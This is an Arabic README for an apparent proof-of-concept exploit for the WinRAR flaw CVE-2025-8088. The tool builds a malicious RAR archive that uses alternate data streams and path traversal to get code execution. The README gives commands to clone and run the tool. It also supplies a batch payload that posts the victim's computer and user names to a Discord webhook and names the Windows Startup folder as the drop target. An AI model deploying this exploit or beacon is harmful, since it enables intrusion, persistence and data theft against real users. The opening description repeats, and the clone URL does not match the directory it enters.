
استغلال لإثبات المفهوم لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 وما دون. تنشئ هذه الأداة أرشيف RAR خبيث يضمّن الحمولات في تدفقات البيانات البديلة (ADS) مع اجتياز المسار، مما قد يؤدي إلى تنفيذ كود تعسفي.
استغلال إثبات مفهوم لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 وما دونها. تنشئ هذه الأداة أرشيف RAR خبيث يضمّن الحمولات في تدفقات البيانات البديلة (ADS) مع اجتياز المسار، مما قد يؤدي إلى تنفيذ تعسفي للكود.
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
عدّل الحمولة لاستدعاء ويب هوك Discord:
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
استبدل YOUR_DISCORD_WEBHOOK_URL بعنوان ويب هوك الفعلي لديك.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\